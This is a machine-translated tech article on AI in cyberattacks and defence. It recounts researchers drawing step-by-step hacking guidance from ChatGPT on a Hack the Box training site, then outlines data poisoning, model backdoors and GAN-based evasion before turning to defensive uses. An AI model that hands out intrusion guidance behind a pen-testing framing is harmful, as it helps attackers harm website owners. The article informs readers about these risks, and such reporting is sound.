Home > Article > Technology peripherals > Don’t blame ChatGPT, AI hacking attacks have already begun
The popularity of ChatGPT has allowed the public to see the amazing performance of AI, but it has also opened up more possibilities for network attacks.
Recently, a research team discovered that there are certain risks in the artificial intelligence ChatGPT, which can provide hackers with step-by-step instructions on how to invade a website.
The team of researchers used a virtual "Hack the Box" cybersecurity training platform to conduct experiments, asking questions to ChatGPT and following its guidance to check whether ChatGPT could provide step-by-step guidance for exploiting the vulnerability.
The researcher asked: "I am facing a penetration testing challenge. I am on a website with only one button, how will I test it for vulnerabilities?"
In response, ChatGPT Answered with five basic points on what to check on a website when searching for vulnerabilities.
By interpreting what they saw in the source code, the researchers got the AI's suggestions on which parts of the code to focus on.
Additionally, they received examples of suggested code changes.
After approximately 45 minutes of chatting with ChatGPT, the researchers were able to hack the provided website.
Although ChatGPT reminds users about hacking guidelines at the end of each recommendation: "Remember to follow ethical hacking guidelines and obtain a license before attempting to test a website for vulnerabilities." It also warns Said "Executing malicious commands on the server may cause serious damage."
But it is undeniable that ChatGPT still provides information to assist users in completing hacking attacks.
Not only that, ChatGPT can also write code and articles. This is a double-edged sword that can be used by cybercriminals to generate malware carrying malicious payloads, write clever phishing emails, etc. Ordinary people Attempting cyberattacks will also become easier.
ChatGPT seems to have become a weapon for cybercrime, but it is worth noting that the criminal behavior of using AI to carry out cyberattacks has been going on long before the birth of ChatGPT here we go. Our common complex and large-scale social engineering attacks, automated vulnerability scanning and deep forgery are all typical cases in this regard.
What’s more, attackers will also use advanced technologies and trends such as AI-driven data compression algorithms. Currently, the cutting-edge methods of using AI technology to carry out cyber attacks include the following:
Data poisoning is to control the predictions of the AI model by manipulating a training set The ability to make models make incorrect predictions, such as marking spam as safe content.
There are two types of data poisoning: attacking the availability of machine learning algorithms; attacking the integrity of the algorithm. Research shows that if 3% of the data in the training set suffers from data poisoning, the prediction accuracy will decrease by 11%.
Through backdoor attacks, an intruder can add parameters to the algorithm without the designer of the model knowing. Attackers use this backdoor to cause the AI system to mistakenly identify specific strings that may carry viruses as benign.
At the same time, data poisoning methods can be transferred from one model to another, thus affecting the accuracy of AI on a large scale.
Generative Adversarial Networks (GANs) are composed of two AIs that compete against each other - one simulates the original content, and the other Responsible for picking out errors. Through the confrontation between the two, they jointly create content that is highly consistent with the original.
Attackers use GANs to simulate general data transmission rules to distract the system and find ways to quickly evacuate sensitive data.
With these capabilities, an attacker can complete their entry and exit in 30-40 minutes. Once attackers start using AI, they can automate these tasks.
In addition, GANs can be used to crack passwords, evade anti-virus software, spoof facial recognition, and create malware that can evade detection based on machine learning. Attackers can use AI to evade security checks, hide in places where they cannot be found, and automatically activate anti-reconnaissance mode.
Bot is the basis of a botnet. It usually refers to the ability to automatically perform predefined functions and can be controlled by predefined instructions. A computer program.
A large number of zombie programs can form a botnet by uniting in a certain way.
As AI algorithms are increasingly used to make decisions, attackers enter the system and discover how the computer program performs transactions, and then use bots to confuse the algorithm, and the AI can also be manipulated to make mistakes. decision.
Of course, technology has always been a double-edged sword. Whether it will cause harm to mankind or benefit mankind depends on the starting point of using technology. Nowadays, AI is also widely used in the security field to improve security protection capabilities and operational efficiency.
Meticulous research data shows that artificial intelligence applications in the field of cybersecurity will grow at an annual rate of 24%, reaching $46 billion by 2027.
So, what are the typical applications of AI technology in network security protection?
Data classification and grading is the cornerstone of data security governance. Only by effectively classifying and grading data can more refined control be adopted in data security management.
AI models occupy an increasingly important position in data security classification and classification scenarios. They can accurately identify the business meaning of data, perform automatic classification and classification, greatly improve the efficiency of data sorting, and are gradually replacing the tedious and monotonous manual work. Data classification and hierarchical labeling work.
By analyzing DNS traffic, artificial intelligence can automatically classify domain names to identify C2, malicious, spam, phishing and cloning Domain names and other domain names.
Before the application of AI, blacklists were mainly relied on for management, but large-scale updates were a heavy workload.
In particular, black products use automatic domain name generation technology to create a large number of domain names and constantly switch domain names. At this time, intelligent algorithms need to be used to learn, detect and block these black domain names.
With the development of new generation network technology, more than 80% of Internet traffic is currently encrypted. The use of encryption technology improves the efficiency of data transmission. security, but also brings greater challenges to network security. Attackers can use encryption technology to transmit sensitive information and malicious data.
With the help of AI technology, there is no need to decrypt and analyze the payload. Instead, network traffic is analyzed through metadata and network packets, as well as application-level security detection. This can achieve security detection of encrypted traffic and effectively resist malicious intent. attack.
At present, AI encrypted traffic analysis has played a role in practice, but this technology is still in the emerging development stage.
Based on statistical data, AI can recommend which protection tools to use or which settings need to be changed to automatically improve network security.
And due to the feedback mechanism, the more data the AI processes, the more accurate the recommendations will be.
In addition, the scale and speed of intelligent algorithms are unmatched by humans, and the perception of threats is real-time and constantly updated.
Alarm analysis is the core content of security operations. Screening out important risk events from massive alarms has brought a heavy burden to security operations personnel. .
In the daily operation process, after using AI technology to learn a large number of historical operation analysis report contents, it can quickly generate analysis reports, capture key anomalies, and generate solutions for alarm events and statistical indicators generated by various security devices. Suggestions to help analysts gain insight into the full picture of events faster.
An AI algorithm using a recurrent neural network and encoding filters can identify "deepfakes", discovering whether the face in the photo has been altered replace.
This feature is particularly useful for remote biometric identification in financial services, preventing scammers from falsifying photos or videos to pretend they are legitimate citizens who can obtain loans.
This AI technology is able to read unstructured information in a non-machine readable format and combine it with information from various networks Structured data of devices enriches data sets to make accurate judgments.
The AI era has arrived, and network security will also undergo tremendous changes in this era. New attack forms will emerge in an endless stream, and new requirements for security protection capabilities will inevitably be put forward.
Adapting to AI, combining human and AI skills, and using AI-based systems to accumulate experience can maximize the advantages of AI in network security protection and prepare for the upcoming network attack and defense upgrades. Be prepared.
The above is the detailed content of Don’t blame ChatGPT, AI hacking attacks have already begun. For more information, please follow other related articles on the PHP Chinese website!